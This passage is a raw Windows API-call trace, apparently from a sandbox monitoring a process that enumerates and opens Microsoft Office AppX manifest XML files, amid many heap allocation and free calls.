CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.492] GetFileType (hFile=0x35c) returned 0x1 [0098.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.492] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.492] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.492] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.493] CloseHandle (hObject=0x35c) returned 1 [0098.493] AreFileApisANSI () returned 1 [0098.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 105 [0098.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.493] GetFileType (hFile=0x35c) returned 0x1 [0098.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.493] CloseHandle (hObject=0x35c) returned 1 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.495] AreFileApisANSI () returned 1 [0098.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 105 [0098.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc3863)) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.495] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP51DE~1.XML")) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c998 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0098.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.496] AreFileApisANSI () returned 1 [0098.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.496] AreFileApisANSI () returned 1 [0098.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 105 [0098.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.497] GetFileType (hFile=0x35c) returned 0x1 [0098.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.497] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.497] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.497] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.497] CloseHandle (hObject=0x35c) returned 1 [0098.498] AreFileApisANSI () returned 1 [0098.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 105 [0098.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.498] GetFileType (hFile=0x35c) returned 0x1 [0098.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.498] CloseHandle (hObject=0x35c) returned 1 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0098.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.591] AreFileApisANSI () returned 1 [0098.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 105 [0098.592] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.612] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.612] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x79381, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~4.XML")) returned 1 [0098.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d178 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: 